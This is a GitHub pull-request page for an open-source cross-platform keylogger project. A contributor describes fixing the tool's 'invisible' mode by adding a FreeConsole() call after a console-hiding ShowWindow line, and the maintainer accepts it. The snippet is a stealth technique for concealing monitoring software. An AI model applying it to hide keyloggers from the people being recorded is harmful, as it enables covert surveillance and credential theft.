GiacomoLaw / Keylogger

A simple keylogger for Windows, Linux and Mac
https://simple-keylogger.github.io/
MIT License
2.06k stars 617 forks source link

Update klog_main.cpp #149

Closed mydarkthawts closed 7 months ago

mydarkthawts commented 7 months ago

I read an issue that says invisible doesn't work. This is correct as it also doesn't work for me. I added the FreeConsole(); call after ShowWindow(FindWindowA("ConsoleWindowClass", NULL), 0); // invisible window which resolves this concern.

GiacomoLaw commented 7 months ago

Thank you!